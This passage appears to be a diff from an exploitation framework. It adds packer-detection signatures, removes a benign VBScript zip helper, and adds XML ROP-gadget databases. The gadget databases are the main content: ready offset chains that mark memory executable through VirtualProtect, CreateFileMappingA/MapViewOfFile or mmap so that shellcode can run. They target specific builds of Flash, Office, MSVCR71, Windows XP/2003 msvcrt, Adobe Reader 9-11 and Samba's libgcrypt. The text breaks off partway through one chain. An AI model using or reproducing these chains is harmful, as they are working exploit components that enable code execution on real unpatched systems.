+signature = F0 40 2D E9 00 40 A0 E1 01 50 A0 E1 02 60 A0 E1 03 70 A0 E1 ?? 00 00 EB 07 30 A0 E1 06 20 A0 E1 05 10 A0 E1 04 00 A0 E1 ?? ?? ?? EB F0 40 BD E8 ?? 00 00 EA ?? 40 2D E9 ?? ?? 9F E5 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 9F E5 00 ?? ?? ?? ?? 00
+ep_only = True
+
+[Hide PE 1.01 -> BGCorp]
+signature = ?? BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 F8 FF E2 0D 0A 2D 3D 5B 20 48 69 64 65 50 45 20 62 79 20 42 47 43 6F 72 70 20 5D 3D 2D
+ep_only = True
+
+[VMProtect 0.7x - 0.8 -> PolyTech]
+signature = 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D
+ep_only = False
+
+[PE Crypt 1.5 -> BitShape Software]
+signature = 60 E8 00 00 00 00 5D 81 ED 55 20 40 00 B9 7B 09 00 00 8D BD 9D 20 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = True
+
+[LameCrypt -> LaZaRus]
+signature = 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8 ?? ?? 40 00 FF E0
+ep_only = True
+
+[PeX 0.99 -> bart^CrackPl]
+signature = E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = True
+
+[Obsidium 1.2.0.0 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 3F 1E 00 00
+ep_only = True
+
+[Ste@lth PE 1.01 -> BGCorp]
+signature = ?? ?? ?? ?? ?? BA ?? ?? ?? 00
+ep_only = True
+
+[GCC-Win32 / XMINGW]
+signature = 55 89 e5 83 ec 08 c7 04 24 01 00 00 00
+ep_only = False
+
@@ -1,62 +0,0 @@
-On Error Resume Next
-
-Function WindowsZip(sFile, sZipFile)
-  'This script is provided under the Creative Commons license located
-  'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
-  'be used for commercial purposes with out the expressed written consent
-  'of NateRice.com
-
-  Set oZipShell = CreateObject("WScript.Shell")  
-  Set oZipFSO = CreateObject("Scripting.FileSystemObject")
-  
-  If Not oZipFSO.FileExists(sZipFile) Then
-    NewZip(sZipFile)
-  End If
-
-  Set oZipApp = CreateObject("Shell.Application")
-  
-  sZipFileCount = oZipApp.NameSpace(sZipFile).items.Count
-
-  aFileName = Split(sFile, "\")
-  sFileName = (aFileName(Ubound(aFileName)))
-  
-  'listfiles
-  sDupe = False
-  For Each sFileNameInZip In oZipApp.NameSpace(sZipFile).items
-    If LCase(sFileName) = LCase(sFileNameInZip) Then
-      sDupe = True
-      Exit For
-    End If
-  Next
-  
-  If Not sDupe Then
-    oZipApp.NameSpace(sZipFile).Copyhere sFile
-
-    'Keep script waiting until Compressing is done
-    On Error Resume Next
-    sLoop = 0
-    Do Until sZipFileCount < oZipApp.NameSpace(sZipFile).Items.Count
-      Wscript.Sleep(100)
-      sLoop = sLoop + 1
-    Loop
-    On Error GoTo 0
-  End If
-End Function
-
-Sub NewZip(sNewZip)
-  'This script is provided under the Creative Commons license located
-  'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
-  'be used for commercial purposes with out the expressed written consent
-  'of NateRice.com
-
-  Set oNewZipFSO = CreateObject("Scripting.FileSystemObject")
-  Set oNewZipFile = oNewZipFSO.CreateTextFile(sNewZip)
-    
-  oNewZipFile.Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, 0)
-  
-  oNewZipFile.Close
-  Set oNewZipFSO = Nothing
-
-  Wscript.Sleep(500)
-End Sub
-
@@ -0,0 +1,80 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>11.3.300.257</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x00243043">POP EAX # RETN</gadget>
+		<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
+		<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
+		<gadget offset="0x002ed0f1">jmp esp</gadget>
+		<gadget offset="0x003eb988">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00662e60">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0058289d">POP ECX # RETN</gadget>
+		<gadget offset="0x00955ebe">Writable location</gadget>
+		<gadget offset="0x00414e84">POP EDI # RETN</gadget>
+		<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0024044c">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00627674">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>11.3.300.265</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x00487414">POP EAX # RETN</gadget>
+		<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
+		<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x000baf77">POP EBP # RETN</gadget>
+		<gadget offset="0x002d8d5c">jmp esp</gadget>
+		<gadget offset="0x00005604">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x004087db">POP ECX # RETN</gadget>
+		<gadget offset="0x00955197">Writable location</gadget>
+		<gadget offset="0x005be57f">POP EDI # RETN</gadget>
+		<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00244a82">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>11.3.300.268</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x0012429b">POP ECX # RETN</gadget>
+		<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
+		<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
+		<gadget offset="0x002b95bb">jmp esp</gadget>
+		<gadget offset="0x0027f328">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0017e345">POP ECX # RETN</gadget>
+		<gadget offset="0x0092027a">Writable location</gadget>
+		<gadget offset="0x002a394a">POP EDI # RETN</gadget>
+		<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
+		<gadget offset="0x002447d1">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+</db>
@@ -0,0 +1,66 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>2007</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x000750fd">POP EAX # RETN</gadget>
+		<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0001803c">POP EBP # RETN</gadget>
+		<gadget offset="0x0001803c">skip 4 bytes</gadget>
+		<gadget offset="0x0001750f">POP EBX # RETN</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x000406e9">POP ECX # RETN</gadget>
+		<gadget offset="0x0008bfae">Writable location</gadget>
+		<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
+		<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c840">JMP [EAX]</gadget>
+		<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
+		<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>2010</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
+		<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
+		<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a429">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
+		<gadget offset="0x0008c638">Writable location</gadget>
+		<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
+		<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00073335">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
+		<gadget offset="0x00076452">POP EAX # RETN</gadget>
+		<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
+		<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
+</gadgets>
+</rop>
+</db>
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>*</target>
+	</compatibility>
+
+	<gadgets base="0x7c340000">
+		<gadget offset="0x00024c66">POP EBP # RETN</gadget>
+		<gadget offset="0x00024c66">skip 4 bytes</gadget>
+		<gadget offset="0x00004edc">POP EAX # RETN</gadget>
+		<gadget value="safe_negate_size">0x00000201</gadget>
+		<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
+		<gadget offset="0x000136e3">POP EBX # RETN</gadget>
+		<gadget value="0xffffffff"></gadget>
+		<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
+		<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
+		<gadget offset="0x00005937">POP EDX # RETN</gadget>
+		<gadget value="0xffffffc0">0x00000040</gadget>
+		<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
+		<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
+		<gadget offset="0x00051e67">Writable location</gadget>
+		<gadget offset="0x00002e58">POP EDI # RETN</gadget>
+		<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
+		<gadget offset="0x000015a2">JMP [EAX]</gadget>
+		<gadget offset="0x00004edc">POP EAX # RETN</gadget>
+		<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
+		<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
+	</gadgets>
+</rop>
+</db>
@@ -0,0 +1,71 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>WINDOWS XP SP2</target>
+		<target>WINDOWS XP SP3</target>
+	</compatibility>
+
+	<gadgets base="0x77c10000">
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001362c">POP EBX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
+		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
+		<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
+		<gadget offset="0x0002ee15">skip 4 bytes</gadget>
+		<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
+		<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0002a184">POP ESI # RETN</gadget>
+		<gadget offset="0x0001aacc">JMP [EAX]</gadget>
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
+		<gadget offset="0x00025459">ptr to 'push esp #  ret</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>WINDOWS SERVER 2003 SP1</target>
+		<target>WINDOWS SERVER 2003 SP2</target>
+	</compatibility>
+
+	<gadgets base="0x77ba0000">
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget offset="0x00001114">VirtualProtect()</gadget>
+		<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x00029801">POP EBP # RETN</gadget>
+		<gadget offset="0x00042265">ptr to 'push esp #  ret'</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0990F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
+		<gadget offset="0x000148d3">POP EBX, RET</gadget>
+		<gadget offset="0x000521e0">.data</gadget>
+		<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
+		<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
+		<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
+		<gadget offset="0x00038c04">POP EDI # RETN</gadget>
+		<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0944F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
+		<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="nop">NOP</gadget>
+		<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
+	</gadgets>
+</rop>
+</db>
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+
+<rop>
+  <compatibility>
+    <target>9</target>
+  </compatibility>
+
+  <gadgets base="0x4a800000">
+    <gadget offset="0x2313d">pop ecx # ret</gadget>
+    <gadget offset="0x2a713">push eax # pop esp # ret</gadget>
+    <gadget offset="0x01f90">pop eax # ret</gadget>
+    <gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
+    <gadget offset="0x07e7d">call [eax] # ret</gadget>
+    <gadget value="0xffffffff">HANDLE hFile</gadget>
+    <gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+    <gadget value="0x00000040">DWORD flProtect</gadget>
+    <gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+    <gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+    <gadget value="0x00000000">LPCTSTR lpName</gadget>
+    <gadget offset="0x0155a">pop edi # ret</gadget>
+    <gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
+    <gadget offset="0x2d4de">pop ebx # ret</gadget>
+    <gadget offset="0x01f90">pop eax # ret</gadget>
+    <gadget offset="0x476aa">pop ecx # ret</gadget>
+    <gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
+    <gadget offset="0x44122">mov edx, ecx</gadget>
+    <gadget offset="0x476aa">pop ecx # ret</gadget>
+    <gadget offset="0x07e7d">call [eax] # ret</gadget>
+    <gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
+    <gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+    <gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+    <gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+    <gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+    <gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
+    <gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
+    <gadget offset="0x476ab">ret</gadget>
+    <gadget value="junk">JUNK</gadget>
+    <gadget value="0x00000400">memcpy length</gadget>
+    <gadget value="junk">JUNK</gadget>
+    <gadget offset="0x17984">xchg eax, ebp # ret</gadget>
+    <gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
+  </gadgets>
+</rop>
+
+<rop>
+  <compatibility>
+    <target>10</target>
+  </compatibility>
+
+  <gadgets base="0x4a800000">
+    <gadget offset="0x26015">pop ecx # ret</gadget>
+    <gadget offset="0x2e090">push eax # pop esp # ret</gadget>
+    <gadget offset="0x2007d">pop eax # ret</gadget>
+    <gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
+    <gadget offset="0x246d5">call [eax] # ret</gadget>
+    <gadget value="0xffffffff">HANDLE hFile</gadget>
+    <gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+    <gadget value="0x00000040">DWORD flProtect</gadget>
+    <gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+    <gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+    <gadget value="0x00000000">LPCTSTR lpName</gadget>
+    <gadget offset="0x05016">pop edi # ret</gadget>
+    <gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
+    <gadget offset="0x14241">pop ebx # ret</gadget>
+    <gadget offset="0x2007d">pop eax # ret</gadget>
+    <gadget offset="0x26015">pop ecx # ret</gadget>
+    <gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
+    <gadget offset="0x4b49d">mov edx, ecx</gadget>
+    <gadget offset="0x26015">pop ecx # ret</gadget>
+    <gadget offset="0x246d5">call [eax] # ret</gadget>
+    <gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
+    <gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+    <gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+    <gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+    <gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+    <gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
+    <gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
+    <gadget offset="0x2a8df">ret</gadget>
+    <gadget value="junk">JUNK</gadget>
+    <gadget value="0x00000400">memcpy length</gadget>
+    <gadget value="junk">JUNK</gadget>
+    <gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
+    <gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
+  </gadgets>
+</rop>
+
+<rop>
+  <compatibility>
+    <target>11</target>
+  </compatibility>
+
+  <gadgets base="0x4a800000">
+    <gadget offset="0x5822c">pop ecx # ret</gadget>
+    <gadget offset="0x2f129">push eax # pop esp # ret</gadget>
+    <gadget offset="0x5597f">pop eax # ret</gadget>
+    <gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
+    <gadget offset="0x3f1d5">call [eax] # ret</gadget>
+    <gadget value="0xffffffff">HANDLE hFile</gadget>
+    <gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+    <gadget value="0x00000040">DWORD flProtect</gadget>
+    <gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+    <gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+    <gadget value="0x00000000">LPCTSTR lpName</gadget>
+    <gadget offset="0x55093">pop edi # ret</gadget>
+    <gadget value="junk">JUNK</gadget>
+    <gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
+    <gadget offset="0x5597f">pop eax # ret</gadget>
+    <gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
+    <gadget value="junk">JUNK</gadget>
+    <gadget offset="0x5822c">pop ecx # ret</gadget>
+    <gadget offset="0x3f1d5">call [eax] # ret</gadget>
+    <gadget offset="0x5d4f8">pop edx # ret</gadget>
+    <gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
+    <gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
+    <gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+    <gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+    <gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+    <gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+    <gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
+    <gadget offset="0x505a0">memcpy address</gadget>
+    <gadget offset="0x60bc4">call eax # ret</gadget>
+    <gadget offset="0x505a0">memcpy address</gadget>
+    <gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
+    <gadget offset="0x463d0">pop ebx # ret</gadget>
+    <gadget value="0x00000400">memcpy length</gadget>
+    <gadget offset="0x5d4f8">pop edx # ret</gadget>
+    <gadget offset="0x5d4f8">pop edx # ret</gadget>
+    <gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
+  </gadgets>
+</rop>
+</db>
@@ -0,0 +1,436 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+        <compatibility>
+            <target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcrypt
+        ii  libgcrypt11                        1.4.5-2                      LGPL Crypto library - runtime library
+        b6977000-b69e8000 r-xp 00000000 08:01 160176     /usr/lib/libgcrypt.so.11.5.3
+        b69e8000-b69eb000 rw-p 00070000 08:01 160176     /usr/lib/libgcrypt.so.11.5.3
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
+                <gadget offset="0x00071ad4">offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00071af4">mmap@got - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00009974">jmp eax</gadget>
+                <gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x00060a1a">pop esi ; ret</gadget>
+                <gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
+                <gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
+                <gadget offset="0x00063dbf">pop eax ; ret</gadget>
+                <gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00055743">xchg eax, ebx ; ret ||  ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00071b6c">memcpy@got - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00055743">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <!-- set ecx to same value than edx -->
+                <gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
+                <gadget offset="0x0005c914"> xchg eax, ecx ; ret  ;  || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006e61f"> xchg eax, esi ; ret  ; || restore eax</gadget>
+                <gadget offset="0x00060a1a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0005b68a">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+
+
+
+
+</rop>
+<rop>
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
+            <target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcr
+        ii  libgcrypt11                        1.5.0-1                                 LGPL Crypto library - runtime library
+        b69e3000-b6a65000 r-xp 00000000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        b6a65000-b6a66000 r**p 00081000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        b6a66000-b6a68000 rw-p 00082000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x000048ee">pop ebx ; ret</gadget>
+                <gadget offset="0x00082ff4">offset of .got.plt section</gadget>
+                <gadget offset="0x0006933f">pop eax; ret</gadget>
+                <gadget offset="0x000830a4">mmap@got - 4</gadget>
+                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00007d79">jmp eax</gadget>
+                <gadget offset="0x00005646">add esp, 0x1C;  ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
